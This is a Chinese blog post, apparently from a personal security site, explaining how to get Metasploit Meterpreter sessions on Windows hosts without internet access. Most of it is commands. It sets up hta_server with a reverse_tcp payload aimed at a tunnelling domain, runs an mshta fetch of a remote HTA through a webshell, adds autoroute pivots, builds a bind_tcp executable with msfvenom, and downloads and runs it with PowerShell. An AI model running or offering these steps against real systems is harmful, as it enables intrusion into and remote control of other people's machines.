【远控使用】metaslpoit不出网上线

hta_server模块使用

1
2
3
4
5
6
7
use exploit/windows/misc/hta_server
set target 1
set payload windows/x64/meterpreter/reverse_tcp
set SRVPORT 80
set lhost ad39402345.wicp.vip
set lport 26240
run

image-20210908142347303

接着在webshell中执行来web传递

1
mshta http://ad39402345.wicp.vip/Q2Uo0sNe.hta

image-20210908142453263

接着用来添加路由

1
2
3
4
run get_local_subnets
run autoroute -s 192.168.186.0/255.255.255.0
run autoroute -d -s 192.168.186.0
bg

然后在该联网主机上建立web传递

image-20210908150023721

再用断网主机访问mshta就行了

Proxychains实现bind连接

接着上面的加一个proxy

生成一个木马

1
msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > bind.exe

利用webshell上传

image-20210908154010042

接着用不出网的主机powershell下载这个bind.exe

1
2
$client = new-object System.Net.WebClient
$client.DownloadFile('http://10.0.1.4/payload.exe','C:/test.exe')

接着执行就可以发现443开始监听了

image-20210908154836794

接着bind连接进去

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.186.4
set lport 443
exploit

image-20210908154903887

远程连接命令mstsc(microsoft terminal server client)

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【远控使用】metaslpoit不出网上线

文章作者:孤桜懶契

发布时间:2021年09月08日 - 14:17:49

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/134.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------